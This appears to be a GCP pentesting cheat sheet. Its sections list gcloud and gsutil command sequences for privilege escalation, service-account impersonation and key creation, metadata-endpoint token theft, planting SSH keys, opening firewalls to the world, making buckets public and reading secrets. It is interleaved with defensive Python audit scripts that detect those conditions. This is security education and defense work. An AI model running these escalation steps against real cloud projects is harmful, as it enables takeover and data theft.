GCP Cheat Sheet

Commands

```bash
# login
gcloud auth login

# list authenticated users
gcloud auth list

# get the current authenticated user with its associated projects
gcloud config list

# switch between accounts
gcloud config set account other-account-user-name

# List organizations you have access to
gcloud organizations list

# List project hierarchy
gcloud projects get-ancestors project-id

# List organization folders
gcloud resource-manager folders list --organization organization_id

# List projects
gcloud projects list

# List compute instances
gcloud compute instances list

# List all the commands
gcloud

# Authenticate with a service account
gcloud auth activate-service-account --key-file svc-key-file.json
```

```bash
# =================
# Service Accounts
# =================

# List all service accounts
gcloud iam service-accounts list


# ================
# IAM
# ================

# Get user permissions on any resource
gcloud organizations get-iam-policy organization_id
gcloud projects get-iam-policy project_id


# ================
# General
# ================

# See the actual HTTP requests sent behind the scenes
gcloud projects list --log-http
```

Notes

Service Accounts

  • Types of service accounts:

    1. Default service accounts: created automatically when a user creates a compute workload.
      • App Engine default service account.
      • Compute Engine default service account.
    2. User-managed service accounts: created and managed by users.
    3. Google-managed service accounts: created and managed by Google.
  • Reasons why service accounts are targeted by attackers:

    1. They are used without MFA.
    2. They are embedded in code and projects, so their keys can be found in GitHub repositories etc.
    3. They don't have an expiration date by default.
  • Service accounts are identified by their unique email address.

  • A service account can have up to 10 keys.

IAM

  • AWS follows an identity-based policy model, meaning policies are attached directly to the identity.
  • GCP and Azure follow a resource-based policy model, meaning the policy is attached to the resource rather than to the identity itself.

GCP Authentication

  • There are multiple ways to authenticate to GCP:
    • GCP Portal [GUI]: username & password
    • gcloud CLI
      • username & password
      • service account with JSON key file
    • Google Cloud API
      • An access token can be validated via https://www.googleapis.com/oauth2/v1/tokeninfo?access_token=AccessToken
    • External application
      • username & password
      • service account JSON key file
      • application default credentials (ADC)
        • When your application runs in a GCP environment such as Compute Engine, Google Kubernetes Engine, or App Engine, ADC automatically detects the environment and determines the appropriate method for obtaining credentials.
        • ADC resolves credentials based on the environment. For example:
          • On Compute Engine and Google Kubernetes Engine, ADC can use the instance's or pod's identity to obtain credentials from the metadata service.
          • On App Engine, ADC can use the built-in service account associated with the application.
          • In local development environments, ADC can use your user credentials if you're using the Google Cloud SDK.
  • GCP credentials are stored on the local system in two files, access_tokens.db and credentials.db:
    • Windows: c:\users\username\AppData\Roaming\gcloud
    • Linux: /home/username/.config/gcloud

Exploitation

IAM Exploitation

Exploit by Set IAM Policy Permission

```bash
# Check IAM policy on project level.
gcloud projects get-iam-policy [project-id] --flatten="bindings[].members" --filter="bindings.members=user:emp01@atomic-nuclear.site" --format="value(bindings.role)"
# List the permissions contained in a role.
gcloud iam roles describe [rolename] --project alert-nimbus-335411

# Add a policy binding to the IAM policy of a project - User.
gcloud projects add-iam-policy-binding [project-id] --member='user:[user-email]' --role='roles/owner'

# Add a policy binding to the IAM policy of a project - Service Account.
gcloud projects add-iam-policy-binding [project-id] --member='serviceAccount:[sa-email]' --role='roles/editor'
```

Exploit by Custom Role Permission Update

```bash
# Check IAM policy on project level.
gcloud projects get-iam-policy [project-id] --flatten="bindings[].members" --filter="bindings.members=user:emp01@atomic-nuclear.site" --format="value(bindings.role)"

# List all permissions in a custom role.
gcloud iam roles describe [rolename] --project alert-nimbus-335411

# Add the project setIamPolicy permission to the custom role.
gcloud iam roles update [RoleName] --project=[my-project-id] --add-permissions=resourcemanager.projects.setIamPolicy
```
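A defender-side audit of the two IAM escalation paths above, added here as an example and not part of the original cheat sheet: it takes the JSON form of the `gcloud projects get-iam-policy --format=json` and `gcloud iam roles describe --format=json` outputs and flags basic-role bindings plus custom roles that carry any of the escalation permissions named on this page. The project id, role name and principals in the sample are constructed.

```python
import json

# Permissions this cheat sheet names as enabling privilege escalation or
# lateral movement; a custom role carrying any of them deserves review.
ESCALATION_PERMISSIONS = {
    "resourcemanager.projects.setIamPolicy",
    "iam.serviceAccountKeys.create",
    "iam.serviceAccounts.getAccessToken",
    "iam.serviceAccounts.getOpenIdToken",
    "iam.serviceAccounts.actAs",
    "cloudfunctions.functions.update",
    "compute.instances.setServiceAccount",
    "compute.instances.setMetadata",
    "compute.projects.setCommonInstanceMetadata",
    "compute.firewalls.update",
    "storage.buckets.setIamPolicy",
    "secretmanager.versions.access",
}
BASIC_ROLES = {"roles/owner", "roles/editor"}


def audit_project_policy(policy, custom_roles):
    """Return (severity, message) findings for one project.

    policy       -- dict parsed from `gcloud projects get-iam-policy P --format=json`
    custom_roles -- {role_name: dict parsed from `gcloud iam roles describe R --project P --format=json`}
    """
    findings = []
    for binding in policy.get("bindings", []):
        role, members = binding["role"], binding.get("members", [])
        if role in BASIC_ROLES:
            findings += [("HIGH", f"{m} holds basic role {role}") for m in members]
        if role in custom_roles:
            granted = set(custom_roles[role].get("includedPermissions", []))
            for perm in sorted(granted & ESCALATION_PERMISSIONS):
                findings += [("HIGH", f"{m} can {perm} via custom role {role}") for m in members]
    return findings


# Constructed sample data standing in for the two gcloud JSON outputs.
SAMPLE_POLICY = json.loads("""{"bindings": [
  {"role": "roles/owner",  "members": ["user:admin@example.com"]},
  {"role": "roles/viewer", "members": ["user:emp01@example.com"]},
  {"role": "projects/demo-project/roles/devRole",
   "members": ["user:emp01@example.com"]}], "version": 1}""")
SAMPLE_ROLES = {"projects/demo-project/roles/devRole": {
    "name": "projects/demo-project/roles/devRole",
    "includedPermissions": ["compute.instances.list",
                            "resourcemanager.projects.setIamPolicy"]}}

if __name__ == "__main__":
    for severity, message in audit_project_policy(SAMPLE_POLICY, SAMPLE_ROLES):
        print(severity, message)
```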

Service Account Exploitation

Service Account Key Admin

Description
  • Key Admin can create a new key for a service account.
  • A service account can have up to 10 keys.
Permission
  • Roles: roles/iam.serviceAccountAdmin, roles/iam.serviceAccountKeyAdmin
  • Permission: iam.serviceAccountKeys.create
```bash
# Check IAM policy on project level.
gcloud projects get-iam-policy [project-id] --flatten="bindings[].members" --filter="bindings.members=user:emp01@atomic-nuclear.site" --format="value(bindings.role)"

# List the service accounts in a GCP project.
gcloud iam service-accounts list

# Get the IAM policy of a service account.
gcloud iam service-accounts get-iam-policy [ServiceAccountID]

# List the keys associated with the specified service account.
gcloud iam service-accounts keys list --iam-account [ServiceAccountID]

# Create a new key for the specified service account.
gcloud iam service-accounts keys create [FileName.json] --iam-account [ServiceAccountID]
```
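The two facts above (at most 10 keys, no expiry by default) are what a key audit should check. Added example, not part of the original cheat sheet: it consumes the JSON output of `gcloud iam service-accounts keys list --format=json` and flags user-managed keys that are old, never expire, or crowd the 10-key limit. The account, key ids, timestamps and the 90-day rotation threshold are constructed assumptions.

```python
from datetime import datetime, timedelta, timezone

MAX_KEYS_PER_ACCOUNT = 10   # hard limit stated in this cheat sheet
MAX_KEY_AGE_DAYS = 90       # assumed rotation policy; tune to your own
NEVER_EXPIRES_YEAR = 9999   # gcloud reports non-expiring keys with a year-9999 validBeforeTime


def _parse_ts(value):
    # gcloud emits RFC 3339 timestamps such as 2024-05-01T00:00:00Z
    return datetime.strptime(value, "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)


def audit_keys(account, keys, now=None):
    """Findings for one service account.

    keys -- list parsed from
            `gcloud iam service-accounts keys list --iam-account ACCOUNT --format=json`
    """
    now = now or datetime.now(timezone.utc)
    findings = []
    # Google-managed (SYSTEM_MANAGED) keys rotate automatically; only user-managed keys matter here.
    user_keys = [k for k in keys if k.get("keyType") == "USER_MANAGED"]
    if len(user_keys) >= MAX_KEYS_PER_ACCOUNT - 2:
        findings.append(f"{account}: {len(user_keys)} user-managed keys "
                        f"(limit {MAX_KEYS_PER_ACCOUNT}); review whether all are still needed")
    for k in user_keys:
        key_id = k["name"].rsplit("/", 1)[-1]
        age = now - _parse_ts(k["validAfterTime"])
        if age > timedelta(days=MAX_KEY_AGE_DAYS):
            findings.append(f"{account}: key {key_id} is {age.days} days old")
        if _parse_ts(k["validBeforeTime"]).year >= NEVER_EXPIRES_YEAR:
            findings.append(f"{account}: key {key_id} never expires")
    return findings


ACCOUNT = "app-sa@demo-project.iam.gserviceaccount.com"   # constructed
SAMPLE_KEYS = [  # constructed, in the shape gcloud prints
    {"name": f"projects/demo-project/serviceAccounts/{ACCOUNT}/keys/sys1",
     "keyType": "SYSTEM_MANAGED", "validAfterTime": "2024-05-25T00:00:00Z",
     "validBeforeTime": "2024-06-10T00:00:00Z"},
    {"name": f"projects/demo-project/serviceAccounts/{ACCOUNT}/keys/old1",
     "keyType": "USER_MANAGED", "validAfterTime": "2023-01-15T00:00:00Z",
     "validBeforeTime": "9999-12-31T23:59:59Z"},
    {"name": f"projects/demo-project/serviceAccounts/{ACCOUNT}/keys/new1",
     "keyType": "USER_MANAGED", "validAfterTime": "2024-05-01T00:00:00Z",
     "validBeforeTime": "2024-08-01T00:00:00Z"},
]
AS_OF = datetime(2024, 6, 1, tzinfo=timezone.utc)   # fixed clock so results are reproducible

if __name__ == "__main__":
    print("\n".join(audit_keys(ACCOUNT, SAMPLE_KEYS, now=AS_OF)))
```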

Service account impersonation

If we hold the role roles/iam.serviceAccountTokenCreator, which carries the following permissions:

  • iam.serviceAccounts.getAccessToken: lets you create OAuth 2.0 access tokens
  • iam.serviceAccounts.getOpenIdToken: lets you create OpenID Connect (OIDC) ID tokens

we can create short-lived credentials for the service account, and we can also impersonate the service account by using --impersonate-service-account.

```bash
# Check IAM policy on project level.
gcloud projects get-iam-policy [project-id] --flatten="bindings[].members" --filter="bindings.members=user:emp01@atomic-nuclear.site" --format="value(bindings.role)"

# List the service accounts in a GCP project.
gcloud iam service-accounts list

# Get the IAM policy of a service account.
gcloud iam service-accounts get-iam-policy [ServiceAccountID]

# Create short-lived credentials [access token] for a service account by impersonation.
gcloud auth print-access-token --impersonate-service-account [ImpersonateServiceAccountEmail]

# Create short-lived credentials [identity token] for a service account by impersonation.
gcloud auth print-identity-token --impersonate-service-account [ImpersonateServiceAccountEmail]

# Verify short-lived credentials [access token].
curl https://www.googleapis.com/oauth2/v1/tokeninfo?access_token=[AccessToken]

# Verify short-lived credentials [identity token]; the tokeninfo parameter for ID tokens is id_token.
curl https://www.googleapis.com/oauth2/v1/tokeninfo?id_token=[IdentityToken]
```

Service account user

Description

  • Allows principals to indirectly access all the resources that the service account can access.
  • A principal can attach the service account to any compute resource and use its permissions.

Permission
  • Roles: roles/iam.serviceAccountUser
  • Permissions: iam.serviceAccounts.actAs
Exploitation
```bash
# Check IAM policy on project level.
gcloud projects get-iam-policy [project-id] --flatten="bindings[].members" --filter="bindings.members=user:emp01@atomic-nuclear.site" --format="value(bindings.role)"

# List the service accounts in a GCP project.
gcloud iam service-accounts list

# Get the IAM policy of a service account.
gcloud iam service-accounts get-iam-policy [ServiceAccountID]

# Create a cloud function with the service account attached.
gcloud functions deploy [my-fun] --timeout 539 --trigger-http --source [function-source] --runtime python37 --entry-point hello_world --service-account [service-account-email]

# Invoke the cloud function and retrieve the temporary credential.
gcloud functions call function-name --data '{}'
```

Cloud Function

  • Cloud Functions is a serverless, event-driven compute service.
  • A cloud function can be triggered/invoked in multiple ways:
    • gcloud CLI
    • Google Cloud Console
    • HTTP request
    • Event driven - Pub/Sub

Cloud function code update

Description
  • The Cloud Functions Admin role allows a threat actor to create a new function or modify the source code of any existing function, and to invoke a cloud function directly from the gcloud CLI.
Permission
  • Roles: roles/cloudfunctions.admin
  • Permissions: cloudfunctions.functions.create, cloudfunctions.functions.update, cloudfunctions.functions.call

Exploitation
```bash
# Check IAM policy on project level.
gcloud projects get-iam-policy [project-id] --flatten="bindings[].members" --filter="bindings.members=user:emp01@atomic-nuclear.site" --format="value(bindings.role)"

# List all cloud functions in a GCP project.
gcloud functions list

# Create / update an existing cloud function's source code.
gcloud functions deploy [function-name] --timeout 539 --source [source-code-directory-path] --runtime python37

# Invoke the cloud function using the gcloud CLI.
gcloud functions call myprivesc-fun --data '{}'
```

Compute Instance

  • An instance is a VM on GCP.
  • The main components of a compute instance are:
    • Instance access
    • Default service account
    • Firewall rules
Instance Access
Default Service Account
  • Compute Engine default service account: projectnumber-compute@developer.gserviceaccount.com
  • Default role: Editor [project level]
  • OAuth scopes:
    • Allow default access [default] - Cloud Storage
    • Allow full access to all Cloud APIs
    • Set access for each API

Access / Identity token extraction

Description
  • A threat actor can execute commands on a compute instance and extract an access token from the metadata endpoint.
  • Commands can be executed through:
    • SSRF / RCE on the VM
    • Direct VM access [SSH / RDP]
    • Startup script execution on the VM
Permission
  • Roles: N/A
  • Permissions: N/A
Exploitation
```bash
# GCP access token extraction.
curl -H "Metadata-Flavor: Google" "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/[SVC_ACCT]/token"

# GCP access token scope extraction (the metadata path is "scopes").
curl -H "Metadata-Flavor: Google" "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/[SVC_ACCT]/scopes"

# Verify a GCP access token.
curl https://www.googleapis.com/oauth2/v1/tokeninfo?access_token=[AccessToken]


# GCP identity token extraction.
curl -H "Metadata-Flavor: Google" "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/[SVC_ACCT]/identity"

# Verify a GCP identity token (the tokeninfo parameter for ID tokens is id_token).
curl https://www.googleapis.com/oauth2/v1/tokeninfo?id_token=[IdentityToken]
```

OAuth Scope manipulation

Description
  • OAuth scopes:
    • Allow default access [default] - Cloud Storage
    • Allow full access to all Cloud APIs
    • Set access for each API
  • To change an instance's service account and access scopes, the instance must be temporarily stopped.
Permissions
  • Roles: roles/compute.admin, roles/compute.instanceAdmin, roles/compute.instanceAdmin.v1, Service Account User
  • Permissions: compute.instances.setServiceAccount
Exploitation
```bash
# Check IAM policy on project level.
gcloud projects get-iam-policy [project-id] --flatten="bindings[].members" --filter="bindings.members=user:emp01@atomic-nuclear.site" --format="value(bindings.role)"

# List all compute instances in a GCP project.
gcloud compute instances list

# Get all information about an instance.
gcloud compute instances describe [instance-1]

# Stop a compute instance.
gcloud compute instances stop instance-1

# Change the service account or OAuth scopes of a compute instance.
gcloud compute instances set-service-account [instance-name] --service-account [service-account-name] --scopes [cloud-platform] --zone [Zone]

# Start the compute instance again.
gcloud compute instances start instance-1
```

Lateral movement (SetMetaData)

  • Metadata contains a lot of information about the project and the instance, e.g. project details, instance details, public SSH keys etc.
  • Metadata can be set at the project level as well as the instance level.
  • We can add a public SSH key for a compute instance using metadata.
  • An instance-level SSH key applies only to that instance.
  • A project-level SSH key applies to all instances within that project.
MetaData on the project level
Description

• Setting SSH key as project metadata.

Permission
  • Roles : roles/compute.instanceAdmin.v1, roles/iam.serviceAccountUser
  • Permissions : compute.projects.setCommonInstanceMetadata, iam.serviceAccounts.actAs
Exploitation
```bash
# Check IAM policy on project level.
gcloud projects get-iam-policy [project-id] --flatten="bindings[].members" --filter="bindings.members=user:emp01@atomic-nuclear.site" --format="value(bindings.role)"

# Get information about the project metadata.
gcloud compute project-info describe

# Generate an SSH key pair.
ssh-keygen

# Put the SSH public key in a file in this format (one USERNAME:KEY entry per line).
username:ssh-rsa [AAAAB3NzaC1yc2EAAAADAQABAAABAQ]

# Set the ssh-keys value in the project metadata.
gcloud compute project-info add-metadata --metadata-from-file=ssh-keys=[KEY_FILE]
```

MetaData on the instance level
Description

• Setting SSH key as instance metadata.

Permission
  • Roles : roles/compute.instanceAdmin.v1, roles/iam.serviceAccountUser
  • Permissions : compute.instances.setMetadata, iam.serviceAccounts.actAs
Exploitation
```bash
# Check IAM policy on project level.
gcloud projects get-iam-policy [project-id] --flatten="bindings[].members" --filter="bindings.members=user:emp01@atomic-nuclear.site" --format="value(bindings.role)"

# Get information about the instance metadata.
gcloud compute instances describe [VM_NAME]

# Generate an SSH key pair.
ssh-keygen

# Put the SSH public key in a file in this format (one USERNAME:KEY entry per line).
username:ssh-rsa [AAAAB3NzaC1yc2EAAAADAQABAAABAQ]

# Set the ssh-keys value in the instance metadata.
gcloud compute instances add-metadata [VM_NAME] --metadata-from-file ssh-keys=[KEY_FILE]
```

Lateral Movement (OSLogin)
  • OS Login is used to manage SSH access to GCP instances through IAM, without having to create and manage individual SSH keys.
  • OS Login allows two types of SSH access privilege:
    • Root user
    • Non-root user
  • OS Login can be configured with 2-step verification.
  • Enable OS Login by setting the following metadata at the project / instance level:
    • enable-oslogin=TRUE
Description

• Access VM instance without ssh key.

Permission
  • Roles : roles/compute.osAdminLogin, roles/compute.osLogin
  • Permissions : compute.instances.osAdminLogin, compute.instances.osLogin
Exploitation
```bash
# Check IAM policy on project level.
gcloud projects get-iam-policy [project-id] --flatten="bindings[].members" --filter="bindings.members=user:emp01@atomic-nuclear.site" --format="value(bindings.role)"

# List all compute instances in a GCP project.
gcloud compute instances list

# Get all information about an instance.
gcloud compute instances describe [instance-1]

# SSH to a compute instance using OS Login.
gcloud compute ssh --zone=[ZONE] [VM_NAME]
```
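One review pass covering the three instance-level findings above (OAuth scope / default service account, metadata ssh-keys at instance and project level, and whether OS Login is enabled), added here as an example and not part of the original cheat sheet. It reads the JSON forms of `gcloud compute instances describe --format=json` and `gcloud compute project-info describe --format=json`; the instance name, project number and key material in the samples are constructed placeholders.

```python
FULL_ACCESS_SCOPE = "https://www.googleapis.com/auth/cloud-platform"
DEFAULT_SA_SUFFIX = "-compute@developer.gserviceaccount.com"


def _metadata_items(obj, field):
    """Flatten <field>.items [{key, value}, ...] into a dict; tolerates a missing object."""
    items = ((obj or {}).get(field) or {}).get("items", [])
    return {item["key"]: item.get("value", "") for item in items}


def audit_instance(instance, project_info=None):
    """instance     -- dict parsed from `gcloud compute instances describe NAME --format=json`
    project_info -- dict parsed from `gcloud compute project-info describe --format=json`
    Returns a list of finding strings."""
    name, findings = instance["name"], []
    for sa in instance.get("serviceAccounts", []):
        email, scopes = sa["email"], sa.get("scopes", [])
        if email.endswith(DEFAULT_SA_SUFFIX):
            findings.append(f"{name}: runs as the Compute Engine default SA {email}")
        if FULL_ACCESS_SCOPE in scopes:
            findings.append(f"{name}: {email} has the full cloud-platform scope")
    inst_md = _metadata_items(instance, "metadata")
    proj_md = _metadata_items(project_info, "commonInstanceMetadata")
    # An instance-level enable-oslogin value overrides the project-level one.
    oslogin = inst_md.get("enable-oslogin", proj_md.get("enable-oslogin", "FALSE"))
    if oslogin.upper() != "TRUE":
        findings.append(f"{name}: OS Login is off, so metadata ssh-keys grant access")
        for level, md in (("instance", inst_md), ("project", proj_md)):
            for line in md.get("ssh-keys", "").splitlines():
                if line.strip():  # one USERNAME:KEY_VALUE entry per line
                    user = line.split(":", 1)[0]
                    findings.append(f"{name}: {level}-level ssh key for user '{user}'")
    return findings


# Constructed samples in the shape gcloud prints; key material is a placeholder.
SAMPLE_INSTANCE = {
    "name": "web-1",
    "serviceAccounts": [{"email": "123456789012" + DEFAULT_SA_SUFFIX,
                         "scopes": [FULL_ACCESS_SCOPE]}],
    "metadata": {"items": [{"key": "ssh-keys",
                            "value": "deploy:ssh-rsa AAAA...PLACEHOLDER deploy"}]},
}
SAMPLE_PROJECT = {
    "name": "demo-project",
    "commonInstanceMetadata": {"items": [{"key": "ssh-keys",
                                          "value": "admin:ssh-rsa AAAA...PLACEHOLDER admin"}]},
}

if __name__ == "__main__":
    print("\n".join(audit_instance(SAMPLE_INSTANCE, SAMPLE_PROJECT)))
```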

VPC

  • The default VPC has 36 default subnets in total [one subnet in each region].
  • A Shared VPC allows the same network to be shared across different projects.

VPC Rules Manipulation

Description
  • In GCP, firewall rules are applied through firewall rule targets:
    • All instances in the network
    • Specified target tags
    • Specified service accounts
  • A threat actor can manipulate firewall rules by:
    • Changing the firewall rule targets.
    • Adding / removing entries in the ingress / egress tables.
Permissions
  • Roles: roles/compute.admin, roles/compute.securityAdmin
  • Permissions: compute.firewalls.create, compute.firewalls.update, compute.networks.updatePolicy
Exploitation
```bash
# Check IAM policy on project level.
gcloud projects get-iam-policy [project-id] --flatten="bindings[].members" --filter="bindings.members=user:emp01@atomic-nuclear.site" --format="value(bindings.role)"

# List all permissions in a custom role.
gcloud iam roles describe [rolename] --project alert-nimbus-335411

# List all firewall rules in a GCP project.
gcloud compute firewall-rules list --format=json

# List all compute instances in a GCP project.
gcloud compute instances list

# Get all information about a VM.
gcloud compute instances describe [instance-1]

# Create a new firewall rule that applies to all instances within a VPC (firewall rule target: all instances in the network).
gcloud compute firewall-rules create threat-rule --allow=tcp:22 --source-ranges="0.0.0.0/0" --direction=INGRESS
```
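The rule created above is exactly what a firewall review should catch: an ingress rule from 0.0.0.0/0 with no target tag or target service account, so it applies to every instance in the network. Added example, not part of the original cheat sheet: it runs over the JSON output of `gcloud compute firewall-rules list --format=json` and grades each world-reachable ingress rule by the ports it opens and by how broadly it targets. Rule names, the project and the network URL in the sample are constructed.

```python
ANY_IPV4 = "0.0.0.0/0"
ADMIN_PORTS = {"22", "3389"}


def _open_ports(rule):
    """Yield (protocol, port) for each allowed entry; a missing port list means every port."""
    for allowed in rule.get("allowed", []):
        for port in allowed.get("ports", ["all"]):
            yield allowed["IPProtocol"], port


def audit_firewall(rules):
    """rules -- list parsed from `gcloud compute firewall-rules list --format=json`"""
    findings = []
    for rule in rules:
        if rule.get("disabled") or rule.get("direction", "INGRESS") != "INGRESS":
            continue
        if ANY_IPV4 not in rule.get("sourceRanges", []):
            continue
        targets = rule.get("targetTags") or rule.get("targetServiceAccounts")
        # No target tag / service account means the rule applies to every instance in the network.
        scope = (f"targets {','.join(targets)}" if targets
                 else f"ALL instances in {rule['network'].rsplit('/', 1)[-1]}")
        for proto, port in _open_ports(rule):
            severity = "HIGH" if port in ADMIN_PORTS or port == "all" else "MEDIUM"
            findings.append((severity, f"{rule['name']}: {proto}:{port} from {ANY_IPV4} to {scope}"))
    return findings


NET = "https://www.googleapis.com/compute/v1/projects/demo-project/global/networks/default"
SAMPLE_RULES = [  # constructed, in the shape gcloud prints
    {"name": "threat-rule", "direction": "INGRESS", "network": NET, "disabled": False,
     "sourceRanges": ["0.0.0.0/0"], "allowed": [{"IPProtocol": "tcp", "ports": ["22"]}]},
    {"name": "allow-https", "direction": "INGRESS", "network": NET, "targetTags": ["web"],
     "sourceRanges": ["0.0.0.0/0"], "allowed": [{"IPProtocol": "tcp", "ports": ["443"]}]},
    {"name": "internal", "direction": "INGRESS", "network": NET,
     "sourceRanges": ["10.0.0.0/8"], "allowed": [{"IPProtocol": "all"}]},
    {"name": "egress-all", "direction": "EGRESS", "network": NET,
     "destinationRanges": ["0.0.0.0/0"], "allowed": [{"IPProtocol": "all"}]},
]

if __name__ == "__main__":
    for severity, message in audit_firewall(SAMPLE_RULES):
        print(severity, message)
```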

Cloud Storage

  • There are two types of IAM policy in Cloud Storage:
    • Bucket policy [uniform bucket-level access] - applied at the bucket level to all objects within the bucket.
    • ACL - applied at the individual object level.
  • Different types of principal [identity] in storage IAM:
    • allUsers - unauthenticated users [anonymous access]
    • allAuthenticatedUsers - any authenticated user with a Google account
    • IAM - users / groups / service accounts within the same organization / project, controlled by IAM

Data Exfiltration using changing bucket policy

Description

• Change the bucket policy and allow everyone to access the data [objects] inside the GCP bucket.

Permissions
  • Roles : roles/storage.admin
  • Permissions : storage.buckets.setIamPolicy
Exploitation
```bash
# Get the GCP bucket subdomains for an organization [Anonymous - enum tool].
cloud_enum.py -k cwl

# Get information about the objects in a bucket [Anonymous - REST API].
curl https://storage.googleapis.com/[BUCKET NAME]

# Get information about the IAM permissions attached to the bucket [Anonymous - REST API].
curl "https://www.googleapis.com/storage/v1/b/[BUCKET_NAME]/iam/testPermissions?permissions=storage.buckets.delete&permissions=storage.buckets.get&permissions=storage.buckets.getIamPolicy&permissions=storage.buckets.setIamPolicy&permissions=storage.buckets.update&permissions=storage.objects.create&permissions=storage.objects.delete&permissions=storage.objects.get&permissions=storage.objects.list&permissions=storage.objects.update"

# List all roles attached to this bucket [gsutil].
gsutil iam get gs://[BUCKET NAME]

# Grant the admin role to allUsers [gsutil].
gsutil iam ch allUsers:admin gs://[BUCKET NAME]
```
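The binding that the last command creates is the condition a bucket exposure check looks for, across both policy types described in this section (uniform bucket-level IAM and legacy ACLs). Added example, not part of the original cheat sheet: it reads the JSON from `gsutil iam get` and `gsutil acl get` and flags allUsers / allAuthenticatedUsers grants, rating write-capable grants higher. The bucket, object and project numbers in the samples are constructed.

```python
import json

PUBLIC_PRINCIPALS = {"allUsers", "allAuthenticatedUsers"}
# Roles / ACL grants that let the principal write or re-share, not just read.
WRITE_ROLES = {"roles/storage.admin", "roles/storage.objectAdmin", "roles/storage.objectCreator",
               "roles/storage.legacyBucketOwner", "roles/storage.legacyBucketWriter"}
WRITE_ACL = {"WRITER", "OWNER"}


def audit_bucket_policy(bucket, policy):
    """policy -- dict parsed from `gsutil iam get gs://BUCKET` (uniform bucket-level access)."""
    findings = []
    for binding in policy.get("bindings", []):
        role = binding["role"]
        for principal in sorted(PUBLIC_PRINCIPALS & set(binding.get("members", []))):
            severity = "CRITICAL" if role in WRITE_ROLES else "HIGH"
            findings.append((severity, f"gs://{bucket}: {principal} has {role}"))
    return findings


def audit_acl(bucket, acl, obj=None):
    """acl -- list parsed from `gsutil acl get gs://BUCKET[/OBJECT]` (legacy per-object ACLs)."""
    target = f"gs://{bucket}" + (f"/{obj}" if obj else "")
    findings = []
    for entry in acl:
        if entry.get("entity") in PUBLIC_PRINCIPALS:
            severity = "CRITICAL" if entry.get("role") in WRITE_ACL else "HIGH"
            findings.append((severity, f"{target}: ACL grants {entry['entity']} {entry['role']}"))
    return findings


# Constructed samples in the shape gsutil prints.
SAMPLE_POLICY = json.loads("""{"bindings": [
  {"role": "roles/storage.objectViewer", "members": ["allUsers"]},
  {"role": "roles/storage.admin",
   "members": ["user:owner@example.com", "allAuthenticatedUsers"]}], "etag": "CAE="}""")
SAMPLE_ACL = [{"entity": "project-owners-123456789012", "role": "OWNER"},
              {"entity": "allUsers", "role": "READER"}]

if __name__ == "__main__":
    for finding in audit_bucket_policy("demo-bucket", SAMPLE_POLICY) + audit_acl("demo-bucket", SAMPLE_ACL, "report.pdf"):
        print(*finding)
```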

Secret Manager

Clear Text Credentials Access

Description

• A threat actor's final goal is to get the clear-text value of a secret.

Permissions
  • Roles : roles/owner, roles/secretmanager.admin, roles/secretmanager.secretAccessor
  • Permissions : secretmanager.versions.access
Exploitation
```bash
# Check IAM policy on project level.
gcloud projects get-iam-policy [project-id] --flatten="bindings[].members" --filter="bindings.members=user:emp01@atomic-nuclear.site" --format="value(bindings.role)"

# List all the secrets in a project.
gcloud secrets list

# Get the IAM policy of an individual secret.
gcloud secrets get-iam-policy [my-secret]

# List all versions of a secret.
gcloud secrets versions list [SecretName]

# Get the clear-text value of a secret version (VERSION is positional, the secret is given with --secret).
gcloud secrets versions access [1] --secret cpsa-key-json
```

GCP Pentest checklist

https://github.com/CyberSecurityUP/GCP-Pentest-Checklist
